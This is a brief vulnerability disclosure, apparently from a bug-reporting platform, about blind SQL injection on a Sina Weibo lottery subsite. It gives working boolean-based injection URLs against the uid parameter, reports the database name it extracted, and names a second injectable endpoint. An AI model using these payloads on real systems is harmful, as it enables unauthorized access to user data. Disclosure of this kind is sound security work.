新浪微博某分站多处SQL注入漏洞盲注点
注入点1:
http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=1%29,1,%28select%201%20union%20select%202%29%29
http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=2%29,1,%28select%201%20union%20select%202%29%29
经简单测试,得出数据库 database() 为:jcsport,其它没测。
其它注入点:
http://cai.weibo.com/pc.php/api/user/matchbet?page=1&size=10&uid=10057693&type=rooms&datetype=1
uid注入
修复方案:
过滤